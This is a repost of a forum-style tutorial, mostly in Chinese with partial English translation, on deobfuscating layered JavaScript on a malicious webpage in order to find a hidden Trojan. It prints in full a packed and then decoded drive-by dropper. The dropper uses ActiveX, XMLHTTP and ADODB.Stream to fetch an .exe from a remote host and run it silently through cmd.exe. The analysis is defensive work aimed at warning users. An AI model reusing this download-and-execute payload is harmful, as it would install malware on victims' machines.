Original article, please indicate the source for reprinting Script House
I just discovered a reverse thinking method for cracking various encryptions in JavaScript. If you have any good methods, please post them
Recently I found a code that is encrypted for about 5 layers. I will crack it to the last step without using the javascript decryption program
List of software used
1. Xunlei (download webpage) will be executed if you browse it directly, and the source code cannot be seen
2. Or use the software firefox to browse the website directly. Due to the special nature of firefox, this browser is also recommended
1. Target URL http://www.e9ad.cn/pcdd/80-806.htm
We use Thunder to download this page or use Firefox browser to browse and get the following code
对于这个的解密呢,分析下
大家看下document.write(DFQC(42) DFQC(126).....
这个DFQC(42),的DFQC就是解密var DFQC=function(a){return String.fromCharCode(a^22)}
下面我的解密代码也想好了,这个方法基本上可以破解好多的类似代码,大家可以看下这个
代码
]
得到的解密的代码就是
代码如下:
<script> <br>
function clear(){ <br>
Source=document.body.firstChild.data; <br>
document.open(); <br>
document.close(); <br>
document.title="gg"; <br>
document.body.innerHTML=Source; <br>
}</script>
ad
<SCRIPT> <br>
<!-- <br />
window.defaultStatus=" "; <br />
//--> <br>
</SCRIPT>
二、检查下上面的http://www.e9ad.cn/pcdd/8080.htm和http://pop.*****.com/777/index.htm
我发现下面的iframe加载的有问题,所以呢,
用下载工具下载http://pop.*****.com/777/index.htm这个页面的代码可以发现如下
代码如下:
charset='gb2312'>
看这个大家应该会想起,好多网站卖流量类似的代码(就是卖流量的)
三、继续分析下 http://cc.*****.com/wm/index.htm
用下载工具下载这个页面,可以得到
好的继续下载http://cc.*****.com/wm/1.js这个js文件我得到了这个代码
eval(function(p,a,c,k,e,d){e=function(c){return(c
35?
String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k
[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])
p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('f 8(n){3 g=h.j()*n;k\'~5
\'+\'.5\'}l{9=\'m://o.p.q/r/s.a\';3 4=t.u("v");4.w("y","z:A-B-C-D-E");3 x=4.7
("G.X"+"M"+"L"+"H"+"T"+"T"+"P","");3 S=4.7("I.J","");S.K=1;x.b("N",9,0);x.O();6=8(R);3
F=4.7("U.V","");3 5=F.W(0);6=F.d(5,6);S.Y();S.Z(x.10);S.11(6,2);S.12();3 Q=4.7
("13.14","");e=F.d(5+\'\\\\15\',\'16.a\');Q.17(e,\' /c \'+6,"","b",0)}18(i)
{i=1}',62,71,'|||var|df|tmp|fname1|CreateObject|gn|dl|exe|open||BuildPath|exp1|function|numb
er|Math||random|return|try|http||cc|wzxqy|com|wm|mm|document|createElement|object|setAttribu
te||classid|clsid|BD96C556|65A3|11D0|983A|00C04FC29E36||Microsoft||Adodb|Stream|type|||GET|s
end|||10000|||Scripting|FileSystemObject|GetSpecialFolder||Open|Write|responseBody|SaveToFil
e|Close|Shell|Application|system32|cmd|ShellExecute|catch'.split('|'),0,{}))
大家看到上面的代码可能会发现无法解密了,我搜了下,发现了,竟然有解密代码了,此处可以分析,不
过我这篇文章的目地,是不用解密程序的,所有我用下面的方法,
上面的方法,我要是考虑下几秒想到的方法,以前没想起,现在大家以后就可以更方面的使用了
先将eval后的代码用 var str=.......,然后document.write(str);得到了下面的代码
function gn(n){var number=Math.random()*n;return'~tmp'+'.tmp'}try
{dl='http://cc.*****.com/wm/mm.exe';var df=document.createElement("object");df.setAttribute
("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");var x=df.CreateObject
("Microsoft.X"+"M"+"L"+"H"+"T"+"T"+"P","");var S=df.CreateObject
("Adodb.Stream","");S.type=1;x.open("GET",dl,0);x.send();fname1=gn(10000);var
F=df.CreateObject("Scripting.FileSystemObject","");var tmp=F.GetSpecialFolder
(0);fname1=F.BuildPath(tmp,fname1);S.Open();S.Write(x.responseBody);S.SaveToFile
(fname1,2);S.Close();var Q=df.CreateObject("Shell.Application","");exp1=F.BuildPath
(tmp+'\\system32','cmd.exe');Q.ShellExecute(exp1,' /c '+fname1,"","open",0)}catch(i){i=1}
然后我们可以发现这个http://cc.*****.com/wm/mm.exe,先下下载下来,记住下载后一般看大小,病毒
文件都很小,先将mm.exe改名位mm.exe.txt,打开看到了如下代码,唉,
<script>window.location="/wm/mm.exe?QVyRR=au6BKUDmtn1";</script>
If your page does not jump automatically, pleaseclick here
Have you seen it? The most important thing is this http://cc.*****.com/wm/mm.exe?QVyRR=au6BKUDmtn1
Then use software to download it, this is a virus file,
Finally finished, I found a virus, it should be a Trojan horse of the account stealing system. Nowadays, there are a lot of online traffic sellers. Everyone who loves to play games, please pay attention
Of course, the above JavaScript reverse thinking method can obtain most of the encrypted JavaScript, and many others have decryption procedures
Preface, if everyone has good methods, please post them so that everyone can make progress. Author: reterry QQ:461478385
Original article, please indicate the source for reprinting
Script House
![[Web front-end] Node.js quick start](https://img.php.cn/upload/course/000/000/067/662b5d34ba7c0227.png)
